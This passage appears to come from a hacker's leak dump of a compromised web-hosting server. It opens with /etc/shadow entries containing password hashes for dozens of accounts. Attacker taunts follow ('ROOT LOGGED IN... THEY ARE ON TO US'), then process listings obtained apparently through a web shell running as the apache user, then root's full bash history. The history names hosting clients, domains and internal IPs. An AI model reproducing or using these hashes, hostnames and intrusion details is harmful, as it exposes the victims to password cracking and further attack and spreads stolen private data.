  3524. mhandlers-user:!!:15182:0:99999:7:::
  3525. psaftp:!!:15182:0:99999:7:::
  3526. sw-cp-server:!!:15182:0:99999:7:::
  3527. webalizer:!!:15182::::::
  3528. postgres:!!:15182::::::
  3529. mailman:!!:15182::::::
  3530. drweb:!!:15182::::::
  3531. postfix:!!:15182::::::
  3532. bcsd:$1$xCMvzTCw$la6TitHPqhZJZxGm8htNm0:15184:0:99999:7:::
  3533. bocs:$1$5MIGny/8$RomAufC87/GVd5jpQqvXd1:15185:0:99999:7:::
  3534. bcso_tiger:$1$sezwL7Dg$FoEEp5RY.3X.nT.uyA1C8/:15184:0:99999:7:::
  3535. ciga:$1$/FQWHz0M$yWPMQj14PQvi1fecxIrsO1:15185:0:99999:7:::
  3536. kcsoms:$1$xAHy/f1k$7xCQaeD8ixjn3xhVwaZyX.:15184:0:99999:7:::
  3537. mcsd:$1$sEyGh2be$PMm64ZLZ7F35Th.EdFZBO1:15184:0:99999:7:::
  3538. bjm:$1$Cy5SbB3b$WHQqxFVZ.mo9CAuw3QK2U.:15184:0:99999:7:::
  3539. demo:$1$yY//AeXg$wNK80Z9Un9tVXIBdSnFVr.:15184:0:99999:7:::
  3540. dymin:$1$Y3Q/Kl9u$BLGlnjVjes3j0Ef6mZKai.:15184:0:99999:7:::
  3541. code:$1$djs7zQTz$MLKsBoIpUu9kQsOJCkgMM/:15184:0:99999:7:::
  3542. bjm2:$1$tW0LeatV$nR94bHILSdmz0Q4N1lpuu1:15184:0:99999:7:::
  3543. polms:$1$dnP9bxxQ$DpXSyrQ6sAFBlchPa1nEd.:15184:0:99999:7:::
  3544. dcsd:$1$ifDMxt/3$vu/BPAh/654jVaUy1FwGk.:15184:0:99999:7:::
  3545. hcsoks:$1$8wW7ldva$S8VCJaXcIVvBY7vfEld2I/:15184:0:99999:7:::
  3546. acsoms:$1$KhajK9K4$gZD3GQ4hFg3bZnm0vi6AN.:15184:0:99999:7:::
  3547. bcsd_sync:$1$uFr8iazf$aByYOYgT811Ip.4wRexL2/:15184:0:99999:7:::
  3548. stoms:$1$lBU2FPZk$HD9JCRmC/zs689ayKbnOO/:15185:0:99999:7:::
  3549. sgsomo:$1$pf9ArBub$aBn.2ZMWAtTYF85YqEep7/:15185:0:99999:7:::
  3550. lcsomo:$1$JR2qCyHf$u41XNGVKhFOdTU9y1e.wY/:15185:0:99999:7:::
  3551. bcsoga:$1$rI93Txxe$2QOjFc33mgEVsYJo89pwf/:15185:0:99999:7:::
  3552. scsomo:$1$r/8EJ7/Q$jbDryfYFa.AZ1pSWHYrqv.:15185:0:99999:7:::
  3553. izcg:$1$um.djC2T$HpUPY4cMmw26EUq1GBFnQ.:15185:0:99999:7:::
  3554. crcsd:$1$PgW3mxOA$WIfi2QX4j5z9HQ/yDadUZ1:15185:0:99999:7:::
  3555. ncsd:$1$z7qrcv0Q$bLlPk0X3ICll7Jj.SYFko.:15185:0:99999:7:::
  3556. johms:$1$YtAcr6vB$rMntSo3tbOZEiAbeFv8FU/:15185:0:99999:7:::
  3557. mcmtn:$1$8Wo2rZXP$y7Ku9Vgu41Ee0mF6zJgv//:15185:0:99999:7:::
  3558. vbcsd:$1$1GxJKxHV$Qc6XRkLc7SZrf3RrSJ/gd1:15185:0:99999:7:::
  3559. rcpica:$1$OWMi9c1P$JvVzpKMhV..4iOLQh.iGz0:15185:0:99999:7:::
  3560. icsd:$1$vYV3gRcq$qorp1ljJnyp/zzx9nnL8d.:15185:0:99999:7:::
  3561. gcsd:$1$KxQLd2nC$emDotofAdSi8FVxHUa6070:15185:0:99999:7:::
  3562. lawmo:$1$XS9q5HHW$WEMi7d5BhZfJ5hFF4tEZy/:15185:0:99999:7:::
  3563.  
  3564. // ROOT LOGGED IN... THEY ARE ON TO US... BUT CAN NEVER STOP US
  3565.  
  3566. # w; ps -aux
  3567. 16:00:00 up 3 days, 14:28, 2 users, load average: 0.04, 0.05, 0.08
  3568. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  3569. bjmsuper pts/0 mthm-static-67-2 09:42 6:10m 0.02s 0.25s sshd: bjmsuper
  3570. root pts/1 mthm-static-67-2 Fri11 10:59 0.54s 0.54s -bash
  3571. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  3572. root 1 0.0 0.0 2160 584 ? Ss Jul27 0:01 init [3]
  3573. root 2 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/0]
  3574. root 3 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/0]
  3575. root 4 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/0]
  3576. root 5 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/1]
  3577. root 6 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/1]
  3578. root 7 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/1]
  3579. root 8 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/2]
  3580. root 9 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/2]
  3581. root 10 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/2]
  3582. root 11 0.0 0.0 0 0 ? S< Jul27 0:00 [migration/3]
  3583. root 12 0.0 0.0 0 0 ? SN Jul27 0:00 [ksoftirqd/3]
  3584. root 13 0.0 0.0 0 0 ? S< Jul27 0:00 [watchdog/3]
  3585. root 14 0.0 0.0 0 0 ? S< Jul27 0:00 [events/0]
  3586. root 15 0.0 0.0 0 0 ? S< Jul27 0:00 [events/1]
  3587. root 16 0.0 0.0 0 0 ? S< Jul27 0:00 [events/2]
  3588. root 17 0.0 0.0 0 0 ? S< Jul27 0:00 [events/3]
  3589. root 18 0.0 0.0 0 0 ? S< Jul27 0:00 [khelper]
  3590. root 19 0.0 0.0 0 0 ? S< Jul27 0:00 [kthread]
  3591. root 25 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/0]
  3592. root 26 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/1]
  3593. root 27 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/2]
  3594. root 28 0.0 0.0 0 0 ? S< Jul27 0:00 [kblockd/3]
  3595. root 29 0.0 0.0 0 0 ? S< Jul27 0:00 [kacpid]
  3596. root 130 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/0]
  3597. root 131 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/1]
  3598. root 132 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/2]
  3599. root 133 0.0 0.0 0 0 ? S< Jul27 0:00 [cqueue/3]
  3600. root 136 0.0 0.0 0 0 ? S< Jul27 0:00 [khubd]
  3601. root 138 0.0 0.0 0 0 ? S< Jul27 0:00 [kseriod]
  3602. root 213 0.0 0.0 0 0 ? S Jul27 0:00 [khungtaskd]
  3603. root 216 0.0 0.0 0 0 ? S< Jul27 0:04 [kswapd0]
  3604. root 217 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/0]
  3605. root 218 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/1]
  3606. root 219 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/2]
  3607. root 220 0.0 0.0 0 0 ? S< Jul27 0:00 [aio/3]
  3608. root 375 0.0 0.0 0 0 ? S< Jul27 0:00 [kpsmoused]
  3609. root 422 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_0]
  3610. root 428 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/0]
  3611. root 429 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/1]
  3612. root 430 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/2]
  3613. root 431 0.0 0.0 0 0 ? S< Jul27 0:00 [ata/3]
  3614. root 432 0.0 0.0 0 0 ? S< Jul27 0:00 [ata_aux]
  3615. root 438 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_1]
  3616. root 439 0.0 0.0 0 0 ? S< Jul27 0:00 [scsi_eh_2]
  3617. root 460 0.0 0.0 0 0 ? S< Jul27 0:00 [kstriped]
  3618. root 481 0.0 0.0 0 0 ? S< Jul27 0:22 [kjournald]
  3619. root 506 0.0 0.0 0 0 ? S< Jul27 0:00 [kauditd]
  3620. root 539 0.0 0.0 2376 628 ? S< Jul27 0:00 [kmpathd/0]
  3621. root 1391 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/1]
  3622. root 1392 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/2]
  3623. root 1393 0.0 0.0 0 0 ? S< Jul27 0:00 [kmpathd/3]
  3624. root 1394 0.0 0.0 0 0 ? S< Jul27 0:00
  3625. [kmpath_handlerd]
  3626. root 1423 0.0 0.0 0 0 ? S< Jul27 0:00 [kjournald]
  3627. root 1687 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/0]
  3628. root 1688 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/1]
  3629. root 1689 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/2]
  3630. root 1690 0.0 0.0 0 0 ? S< Jul27 0:00 [kondemand/3]
  3631. root 2146 0.0 0.0 12628 776 ? S< Jul27 0:00 [rpciod/0]
  3632. root 2259 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/1]
  3633. root 2260 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/2]
  3634. root 2261 0.0 0.0 0 0 ? S< Jul27 0:00 [rpciod/3]
  3635. rpcuser 2270 0.0 0.0 1964 744 ? Ss Jul27 0:00 rpc.statd
  3636. root 2302 0.0 0.0 5952 636 ? Ss Jul27 0:00 rpc.idmapd
  3637. dbus 2330 0.0 0.0 2844 940 ? Ss Jul27 0:00 dbus-daemon
  3638. --system
  3639. root 2343 0.0 0.0 2256 768 ? Ss Jul27 0:00 /usr/sbin/hcid
  3640. root 2349 0.0 0.0 1832 504 ? Ss Jul27 0:00 /usr/sbin/sdpd
  3641. root 2380 0.0 0.0 0 0 ? S< Jul27 0:00 [krfcommd]
  3642. root 2424 0.0 0.0 12956 1396 ? Ssl Jul27 0:00 pcscd
  3643. root 2438 0.0 0.0 1760 524 ? Ss Jul27 0:00 /usr/sbin/acpid
  3644. root 2462 0.0 0.0 2008 452 ? Ss Jul27 0:00 /usr/bin/hidd
  3645. --server
  3646. root 2492 0.0 0.0 27364 1368 ? Ssl Jul27 0:00 automount
  3647. root 2565 0.0 0.0 10260 2316 ? Ss Jul27 0:00 cupsd
  3648. root 2582 0.0 0.0 2836 872 ? Ss Jul27 0:00 xinetd
  3649. -stayalive -pidfile /var/run/xinetd.pid
  3650. root 2687 0.0 0.0 6972 1804 ? Ss Jul27 0:05
  3651. /usr/libexec/postfix/master
  3652. root 2721 0.0 0.0 2000 364 ? Ss Jul27 0:00 gpm -m
  3653. /dev/input/mice -t exps2
  3654. postgres 2969 0.0 0.1 21248 3320 ? S Jul27 0:00
  3655. /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
  3656. postgres 2971 0.0 0.0 11024 864 ? S Jul27 0:00 postgres:
  3657. logger process
  3658. postgres 2973 0.0 0.0 21248 948 ? S Jul27 0:00 postgres:
  3659. writer process
  3660. postgres 2974 0.0 0.0 12028 768 ? S Jul27 0:00 postgres: stats
  3661. buffer process
  3662. postgres 2975 0.0 0.0 11212 948 ? S Jul27 0:00 postgres: stats
  3663. collector process
  3664. drweb 3167 0.2 3.8 122892 119308 ? Ss Jul27 13:13 drwebd.real
  3665. root 3186 0.0 0.3 41216 10008 ? S Jul27 0:24
  3666. /usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini
  3667. /usr/lib/plesk-9.0/psa-health-monitor-notification.php
  3668. root 3200 0.6 0.0 71956 2632 ? Ssl Jul27 31:31
  3669. /usr/sbin/sw-collectd -C /etc/sw-collectd/collectd.conf
  3670. root 3219 0.0 0.0 5380 1132 ? Ss Jul27 0:00 crond
  3671. xfs 3244 0.0 0.0 3264 992 ? Ss Jul27 0:00 xfs -droppriv
  3672. -daemon
  3673. root 3269 0.0 0.0 2360 436 ? Ss Jul27 0:00 /usr/sbin/atd
  3674. avahi 3296 0.0 0.0 2696 1300 ? Ss Jul27 0:00 avahi-daemon:
  3675. running [ip-173-201-44-217.local]
  3676. avahi 3297 0.0 0.0 2696 432 ? Ss Jul27 0:00 avahi-daemon:
  3677. chroot helper
  3678. 68 3310 0.0 0.1 5788 3780 ? Ss Jul27 0:00 hald
  3679. root 3311 0.0 0.0 3264 988 ? S Jul27 0:00 hald-runner
  3680. 68 3319 0.0 0.0 2108 816 ? S Jul27 0:00
  3681. hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
  3682. root 3348 0.0 0.0 33228 532 ? Sl Jul27 0:00 /usr/bin/hptsvr
  3683. root 3650 0.0 0.3 26128 10404 ? SN Jul27 0:00 /usr/bin/python
  3684. -tt /usr/sbin/yum-updatesd
  3685. root 3653 0.0 0.0 2656 1136 ? SN Jul27 0:00
  3686. /usr/libexec/gam_server
  3687. root 3707 0.0 0.0 3612 428 ? S Jul27 0:00
  3688. /usr/sbin/smartd -q never
  3689. root 3711 0.0 0.0 1748 440 tty2 Ss+ Jul27 0:00 /sbin/mingetty
  3690. tty2
  3691. root 3712 0.0 0.0 1748 444 tty3 Ss+ Jul27 0:00 /sbin/mingetty
  3692. tty3
  3693. root 3713 0.0 0.0 1748 464 tty4 Ss+ Jul27 0:00 /sbin/mingetty
  3694. tty4
  3695. root 3716 0.0 0.0 1748 444 tty5 Ss+ Jul27 0:00 /sbin/mingetty
  3696. tty5
  3697. root 3718 0.0 0.0 1748 444 tty6 Ss+ Jul27 0:00 /sbin/mingetty
  3698. tty6
  3699. root 5002 0.0 0.0 1748 440 tty1 Ss+ Jul27 0:00 /sbin/mingetty
  3700. tty1
  3701. root 9735 0.0 0.0 2940 552 ? S Jul29 0:00
  3702. /usr/lib/courier-imap/couriertcpd -address=0
  3703. -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40
  3704. -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143
  3705. /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  3706. root 9737 0.0 0.0 1616 244 ? S Jul29 0:00
  3707. /usr/sbin/courierlogger imapd
  3708. root 9745 0.0 0.0 2940 568 ? S Jul29 0:00
  3709. /usr/lib/courier-imap/couriertcpd -address=0
  3710. -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40
  3711. -maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993
  3712. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  3713. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  3714. root 9747 0.0 0.0 1616 244 ? S Jul29 0:00
  3715. /usr/sbin/courierlogger imapd-ssl
  3716. root 9753 0.0 0.0 2940 568 ? S Jul29 0:00
  3717. /usr/lib/courier-imap/couriertcpd -address=0
  3718. -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40
  3719. -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110
  3720. /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
  3721. root 9755 0.0 0.0 1616 244 ? S Jul29 0:00
  3722. /usr/sbin/courierlogger pop3d
  3723. root 9762 0.0 0.0 2940 552 ? S Jul29 0:00
  3724. /usr/lib/courier-imap/couriertcpd -address=0
  3725. -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40
  3726. -maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995
  3727. /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login
  3728. /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
  3729. root 9764 0.0 0.0 1616 244 ? S Jul29 0:00
  3730. /usr/sbin/courierlogger pop3d-ssl
  3731. root 10009 0.0 0.0 0 0 ? S 12:50 0:00 [pdflush]
  3732. root 11853 0.0 0.9 34508 29812 ? Ss Jul29 0:00 /usr/bin/spamd
  3733. --username=popuser --daemonize --nouser-config --helper-home-dir=/var/qmail
  3734. --max-children 5 --create-prefs
  3735. --virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassin
  3736. --pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock
  3737. popuser 11854 0.0 0.9 34508 28388 ? S Jul29 0:00 spamd child
  3738. popuser 11855 0.0 0.9 34508 28312 ? S Jul29 0:00 spamd child
  3739. 503 17229 0.0 0.2 10356 6568 ? S Jul27 0:43
  3740. /usr/sbin/sw-cp-serverd -f /etc/sw-cp-server/config
  3741. root 18794 0.0 0.0 4628 1216 ? S Jul27 0:00 /bin/sh
  3742. /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock
  3743. --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
  3744. --user=mysql
  3745. mysql 18844 0.3 1.0 150116 32948 ? Sl Jul27 17:10
  3746. /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
  3747. --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking
  3748. --socket=/var/lib/mysql/mysql.sock
  3749. postfix 20135 0.0 0.0 7036 1780 ? S 14:37 0:00 pickup -l -t
  3750. fifo -u -o content_filter smtp:127.0.0.1:10027
  3751. postfix 20730 0.0 0.0 7728 2544 ? S Jul28 0:05 qmgr -l -t fifo
  3752. -u
  3753. postfix 20733 0.0 0.0 7072 1940 ? S Jul28 0:00 tlsmgr -l -t
  3754. unix -u
  3755. root 23510 0.0 0.1 12000 3420 ? Ss 09:42 0:00 sshd: bjmsuper
  3756. [priv]
  3757. bjmsuper 23516 0.0 0.0 12000 1852 ? S 09:42 0:00 sshd:
  3758. bjmsuper@pts/0
  3759. bjmsuper 23517 0.0 0.0 4632 1476 pts/0 Ss 09:42 0:00 -bash
  3760. root 23545 0.0 0.0 9404 2092 pts/0 S 09:42 0:00 su -
  3761. root 23546 0.0 0.0 4752 1444 pts/0 S+ 09:42 0:00 -bash
  3762. root 24221 0.0 0.0 7220 1056 ? Ss Jul28 0:00 /usr/sbin/sshd
  3763. drweb 25217 0.0 3.8 122892 117976 ? S 15:30 0:00 drwebd.real
  3764. drweb 25218 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real
  3765. drweb 25219 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real
  3766. drweb 25220 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real
  3767. named 26286 0.0 0.2 75300 6296 ? Ssl Jul27 0:03 /usr/sbin/named
  3768. -u named -c /etc/named.conf -u named -t /var/named/run-root
  3769. root 28663 0.0 0.0 0 0 ? S 15:48 0:00 [pdflush]
  3770. root 29137 0.0 0.6 44620 20492 ? Ss 15:48 0:00 /usr/sbin/httpd
  3771. apache 29139 0.0 0.2 30444 8224 ? S 15:48 0:00 /usr/sbin/httpd
  3772. apache 29140 0.0 0.8 54880 26848 ? S 15:48 0:00 /usr/sbin/httpd
  3773. apache 29141 0.0 0.5 45352 16812 ? S 15:48 0:00 /usr/sbin/httpd
  3774. apache 29142 0.0 0.5 45188 16312 ? S 15:48 0:00 /usr/sbin/httpd
  3775. apache 29143 0.0 0.8 54820 26052 ? S 15:48 0:00 /usr/sbin/httpd
  3776. apache 29145 0.0 0.5 45368 16896 ? S 15:48 0:00 /usr/sbin/httpd
  3777. apache 29146 0.0 0.5 45516 16564 ? S 15:48 0:00 /usr/sbin/httpd
  3778. apache 29148 0.0 0.5 45536 16508 ? S 15:48 0:00 /usr/sbin/httpd
  3779. apache 29194 0.0 0.8 54796 26952 ? S 15:48 0:00 /usr/sbin/httpd
  3780. apache 29195 0.0 0.5 45404 16312 ? S 15:48 0:00 /usr/sbin/httpd
  3781. apache 29197 0.0 0.8 54844 25836 ? S 15:48 0:00 /usr/sbin/httpd
  3782. apache 29198 0.0 0.5 45224 15928 ? S 15:48 0:00 /usr/sbin/httpd
  3783. apache 29199 0.0 0.5 45232 15828 ? S 15:48 0:00 /usr/sbin/httpd
  3784. apache 29200 0.0 0.8 54872 26868 ? S 15:48 0:00 /usr/sbin/httpd
  3785. apache 29201 0.0 0.5 45268 17176 ? S 15:48 0:00 /usr/sbin/httpd
  3786. apache 29202 0.0 0.5 45196 15784 ? S 15:48 0:00 /usr/sbin/httpd
  3787. apache 29203 0.0 0.8 54908 27108 ? S 15:48 0:00 /usr/sbin/httpd
  3788. apache 29205 0.0 0.5 45376 16368 ? S 15:48 0:00 /usr/sbin/httpd
  3789. apache 29206 0.0 0.8 54844 26268 ? S 15:48 0:00 /usr/sbin/httpd
  3790. apache 29207 0.0 0.5 45444 16520 ? S 15:48 0:00 /usr/sbin/httpd
  3791. apache 29465 0.1 0.5 45152 15460 ? S 15:57 0:00 /usr/sbin/httpd
  3792. apache 29617 0.0 0.0 2548 984 ? S 16:00 0:00 sh -c w;ps -aux
  3793. apache 29620 0.0 0.0 2276 824 ? R 16:00 0:00 ps -aux
  3794. root 30158 0.0 0.1 12136 3224 ? Ss Jul29 0:03 sshd:
  3795. root@pts/1
  3796. root 30168 0.0 0.0 4748 1536 pts/1 Ss+ Jul29 0:00 -bash
  3797.  
  3798. // LETS SEE HOW THEY ATTEMPTED TO SECURE THEIR NEW SERVER...
  3799.  
  3800. # cat ~root/.bash_history
  3801. ifconfig
  3802. ping 10.0.0.1
  3803. ping 10.0.0.254
  3804. service sshd status
  3805. service network restart
  3806. service sshd restart
  3807. service iptables restart
  3808. service iptables stop
  3809. service iptables start
  3810. exit
  3811. service iptables stop
  3812. service psa start
  3813. service psa status
  3814. netstat -anp | less
  3815. tcpdump not port ssh
  3816. yum update -y
  3817. date
  3818. pwd
  3819. mkdir htmldoc
  3820. wget
  3821. http://www.htmldoc.org/software.php?VERSION=1.8.27&FILE=htmldoc/1.8.27/htmldoc-1
  3822. .8.27-source.tar.gz
  3823. ls
  3824. rm software.php\?VERSION\=1.8.27
  3825. cd htmldoc/
  3826. wget http://ftp.easysw.com/pub/htmldoc/1.8.27/htmldoc-1.8.27-source.tar.gz
  3827. gunzip htmldoc-1.8.27-source.tar.gz
  3828. tar -xvf htmldoc-1.8.27-source.tar
  3829. cd htmldoc-1.8.27
  3830. ./configure
  3831. yum install gcc-c++
  3832. make
  3833. make install
  3834. cd ..
  3835. cd ..
  3836. mkdir ImageMagick
  3837. yum install tcl-devel libpng-devel libjpg-devel ghostscript-devel bzip2-devel
  3838. freetype-devel libtiff-devel
  3839. pwd
  3840. cd ImageMagick/
  3841. wget ftp://ftp.imagemagick.org/pub/ImageMagick/ImageMagick.tar.gz
  3842. tar -xzvf ImageMagick.tar.gz
  3843. cd ImageMagick-6.7.1-0/
  3844. ls
  3845. ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
  3846. --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
  3847. --with-jp2=yes --with-png=yes --with-tiff=yes
  3848. yum install java-1.6.0-openjdk-devel.i386
  3849. cd /usr/src/
  3850. ls
  3851. wget http://www.pdflib.com/binaries/PDFlib/705/PDFlib-Lite-7.0.5.tar.gz
  3852. tar -xzpf PDFlib-Lite-7.0.5.tar.gz
  3853. cd PDFlib-Lite-7.0.5
  3854. ls
  3855. ./configure -prefix=/usr/local
  3856. make
  3857. make install
  3858. yum install php-pear
  3859. pecl install pdflib
  3860. cp /usr/local/lib/libpdf.so /usr/include/php/ext
  3861. echo "[libpdf]" >> /etc/php.ini
  3862. echo "extension=pdf.so" >> /etc/php.ini
  3863. service httpd restart
  3864. cd /etc
  3865. ls php.ini
  3866. vi php.ini
  3867. vi php.ini
  3868. service httpd restart
  3869. cd
  3870. cd ImageMagick/
  3871. ls
  3872. cd ImageMagick
  3873. ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
  3874. --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
  3875. --with-jp2=yes --with-png=yes --with-tiff=yes
  3876. ls
  3877. cd ImageMagick-6.7.1-0/
  3878. ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
  3879. --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
  3880. --with-jp2=yes --with-png=yes --with-tiff=yes
  3881. yum install libjpeg-devel
  3882. yum install tcl-devel
  3883. yum install libpng-devel
  3884. yum install ghostscript-devel
  3885. yum install bzip2-devel
  3886. yum install freetype-devel
  3887. yum install libtiff-devel
  3888. ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
  3889. --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
  3890. --with-jp2=yes --with-png=yes --with-tiff=yes
  3891. ./configure --prefix=/usr/ --with-bzlib=yes --with-fontconfig=yes
  3892. --with-freetype=yes --with-gslib=yes --with-gvc=yes --with-jpeg=yes
  3893. --with-jp2=yes --with-png=yes --with-tiff=yes
  3894. make clean
  3895. make
  3896. make install
  3897. cd .ssh/
  3898. ll
  3899. chown root:root authorized_keys2
  3900. vi /etc/my.cnf
  3901. service mysqld restart
  3902. pkill mysql
  3903. service mysqld restart
  3904. ps -ef | grep my
  3905. vi /etc/my.cnf
  3906. service mysqld start
  3907. /usr/local/psa/bin/reconfigurator.pl mapfile
  3908. vi mapfile
  3909. ifconfig -a
  3910. vi mapfile
  3911. ifconfig -a
  3912. /usr/local/psa/bin/reconfigurator.pl mapfile
  3913. mv mapfile mapfile.old
  3914. /usr/local/psa/bin/reconfigurator.pl mapfile
  3915. vi mapfile
  3916. /usr/local/psa/bin/reconfigurator.pl mapfile
  3917. vi mapfile
  3918. mv mapfile mapfile88
  3919. /usr/local/psa/bin/reconfigurator.pl mapfile
  3920. vi mapfile
  3921. ll
  3922. cat mapfile.old
  3923. /usr/local/psa/bin/reconfigurator.pl mapfile.old
  3924. vi mapfile.old
  3925. /usr/local/psa/bin/reconfigurator.pl mapfile.old
  3926. vi mapfile.old
  3927. vi mapfile.old
  3928. ls
  3929. ifconfig -a
  3930. ifconfig -a
  3931. rm mapfile
  3932. /usr/local/psa/bin/reconfigurator.pl mapfile.old
  3933. /usr/local/psa/bin/reconfigurator.pl mapfile
  3934. vi mapfile
  3935. ls /etc/sysconfig/network-scripts/
  3936. cd /etc/sysconfig/network-scripts/
  3937. ls
  3938. ls
  3939. less ifcfg-eth0
  3940. cd
  3941. ls
  3942. finder.pl /var/www/vhosts/
  3943. finder.pl /var/www/vhosts/
  3944. find /var/www/vhosts/
  3945. less /var/log/rkhunter.log
  3946. cd
  3947. cd /var/www/vhosts/cityofgassville.org/
  3948. ls
  3949. cd httpsdocs/
  3950. ls
  3951. less index.html
  3952. cd
  3953. cd /var/www/vhosts/mostwantedwebsites.net/
  3954. ll
  3955. cd httpdocs/
  3956. ls
  3957. ll
  3958. mkdir ../old
  3959. mv access_log.processed _bak/ csv_for_lead_hill_change_log.php test/ ../old/
  3960. ll
  3961. telnet mail.cityofgassville.com 25
  3962. ssh 173.201.44.1
  3963. cd /var/www/vhosts/
  3964. ls
  3965. cd default/
  3966. ll
  3967. cd htdocs/
  3968. ll
  3969. vi index.html
  3970. vi .htaccess
  3971. cd ..
  3972. cd ..
  3973. ls
  3974. cd mostwantedgovernmentwebsites.com
  3975. ll
  3976. cd httpdocs/
  3977. ll
  3978. find . -name \*bak\*
  3979. find . -perm 777 -ls
  3980. chown apache:apache ./uploads
  3981. chmod 1755 uploads/
  3982. ls admin
  3983. find . -perm 777 -type f -exec chmod 644 {} \; -ls
  3984. find uploads/ -ls
  3985. ls
  3986. ll
  3987. ll api
  3988. less api/index.php
  3989. mkdir ../old
  3990. find . -name \*bak\*
  3991. find . -name \*bak\* -exec mv -vb {} ../old/ \;
  3992. find . -name \*bak\*
  3993. ls
  3994. ll
  3995. cd /var/www/vhosts/
  3996. ls
  3997. cd default/
  3998. ll -a
  3999. cd htdocs/
  4000. ll
  4001. vi .htaccess
  4002. service httpd restart
  4003. vi .htaccess
  4004. service httpd restart
  4005. ls
  4006. ll
  4007. tcpdump port 80
  4008. tcpdump port 80 -n
  4009. tcpdump port 80
  4010. tcpdump port 80 -s 1500
  4011. tcpdump port 80 -s 1500 -A
  4012. tcpdump port 80 -s 1500 -A| less
  4013. cd ../../
  4014. cd mostwantedgovernmentwebsites.com/
  4015. cd httpdocs/
  4016. vi index.htm
  4017. cd ../..
  4018. cd ../
  4019. cd -
  4020. ls
  4021. cd mostwantedwebsites.net/
  4022. cd httpdocs/
  4023. vi index.htm
  4024. less ../statistics/logs/access_log
  4025. ls
  4026. pwd
  4027. pwd
  4028. cd ../../
  4029. ls
  4030. cd mostwantedgovernmentwebsites.com
  4031. ls
  4032. ll
  4033. cd httpdocs/
  4034. ll
  4035. vi index.htm
  4036. mv index.htm index.htm_bak
  4037. vi index.htm
  4038. less ../statistics/logs/access_log
  4039. ls
  4040. mv index.htm_bak index.htm
  4041. cd ../../
  4042. ls
  4043. cd mostwantedwebsites.net/
  4044. ls
  4045. cd httpdocs/
  4046. ls
  4047. mv index.htm index.htm_bak
  4048. mv index.htm_bak index.htm
  4049. service httpd restart
  4050. pwd
  4051. less index.htm
  4052. pwd
  4053. pwd
  4054. mv index.htm index.htm_bak
  4055. ls
  4056. cp case_study.htm index.htm
  4057. less index.htm
  4058. pwd
  4059. mv index.htm_bak index.htm
  4060. cd ..
  4061. cd ..
  4062. cd default/
  4063. ll
  4064. cd htdocs/
  4065. vi .htaccess
  4066. yum install jp2-devel
  4067. yum list | less
  4068. yum list | less
  4069. yum install fontconfig-devel
  4070. wget http://www.ipchicken.com -O /dev/stdout | less
